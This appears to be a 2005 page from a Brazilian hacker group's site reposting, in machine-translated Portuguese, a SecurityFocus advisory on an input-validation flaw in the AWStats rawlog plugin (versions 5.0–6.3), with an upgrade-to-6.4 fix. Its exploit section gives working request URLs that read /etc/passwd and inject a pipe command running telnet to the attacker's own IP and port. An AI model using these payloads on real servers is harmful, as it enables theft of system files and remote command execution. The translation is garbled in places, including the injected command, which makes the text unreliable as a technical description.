#BYS - [B]reaking [Y]our [S]ecurity [2oo5] irc.brasnet.org

.:: Vulnerabilidades ::.

.:: AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability ::.

.:: Informação ::.
identificação do bugtraq	10950
objeto	-------
classe	Erro Do Validation Da Entrada
cve	Cve-mapa-nomatch
remoto	Sim
local	Não
publicado	Agosto 16, 2004
updated	Fevereiro 16, 2005
vulnerável
AWStats AWStats 5,0 AWStats AWStats 5,1 AWStats AWStats 5,2 AWStats AWStats 5,3 AWStats AWStats 5,4 AWStats AWStats 5,5 AWStats AWStats 5,6 AWStats AWStats 5,7 AWStats AWStats 5,8 AWStats AWStats 5,9 AWStats AWStats 6,0 AWStats AWStats 6,1 AWStats AWStats 6,2 AWStats AWStats 6,3
not vulnerable
AWStats AWStats 6,4
.:: Exploit ::.
O seguinte exemplo está disponível: http://www.example.com/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog &logfile=/etc/passwd http://www.example.com/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog &logfile=&logfile =\|telnet < < porto > do seu IP > Onde o valor de parâmetro ' do &config ' é a lima da configuração para www.example.com. Relata-se que o nome de arquivo da configuração pode ser colhido da fonte do HTML da página dos awstats para o local do alvo.
.:: Solução ::.
O vendedor liberou AWStats 6,4 para dirigir-se a esta edição. AWStats AWStats 5,0: Melhoramento awstats-6.4.tgz De AWStats http://awstats.sourceforge.net/files/awstats-6.4.tgz AWStats AWStats 5,1: Melhoramento awstats-6.4.tgz De AWStats http://awstats.sourceforge.net/files/awstats-6.4.tgz AWStats AWStats 5,2: Melhoramento awstats-6.4.tgz De AWStats http://awstats.sourceforge.net/files/awstats-6.4.tgz AWStats AWStats 5,3: Melhoramento awstats-6.4.tgz De AWStats http://awstats.sourceforge.net/files/awstats-6.4.tgz AWStats AWStats 5,4: Melhoramento awstats-6.4.tgz De AWStats http://awstats.sourceforge.net/files/awstats-6.4.tgz AWStats AWStats 5,5: Melhoramento awstats-6.4.tgz De AWStats http://awstats.sourceforge.net/files/awstats-6.4.tgz AWStats AWStats 5,6: Melhoramento awstats-6.4.tgz De AWStats http://awstats.sourceforge.net/files/awstats-6.4.tgz AWStats AWStats 5,7: Melhoramento awstats-6.4.tgz De AWStats http://awstats.sourceforge.net/files/awstats-6.4.tgz AWStats AWStats 5,8: Melhoramento awstats-6.4.tgz De AWStats http://awstats.sourceforge.net/files/awstats-6.4.tgz AWStats AWStats 5,9: Melhoramento awstats-6.4.tgz De AWStats http://awstats.sourceforge.net/files/awstats-6.4.tgz AWStats AWStats 6,0: Melhoramento awstats-6.4.tgz De AWStats http://awstats.sourceforge.net/files/awstats-6.4.tgz AWStats AWStats 6,1: Melhoramento awstats-6.4.tgz De AWStats http://awstats.sourceforge.net/files/awstats-6.4.tgz AWStats AWStats 6,2: Melhoramento awstats-6.4.tgz De AWStats http://awstats.sourceforge.net/files/awstats-6.4.tgz AWStats AWStats 6,3: Melhoramento awstats-6.4.tgz De AWStats http://awstats.sourceforge.net/files/awstats-6.4.tgz

Fonte: SecurityFocus
http://www.securityfocus.com/bid/10950

.:: Resolução recomendada: 800x600 pixeis ::.

Copyright © [B]reaking [Y]our [S]ecurity 2005. Todos os Direitos reservados.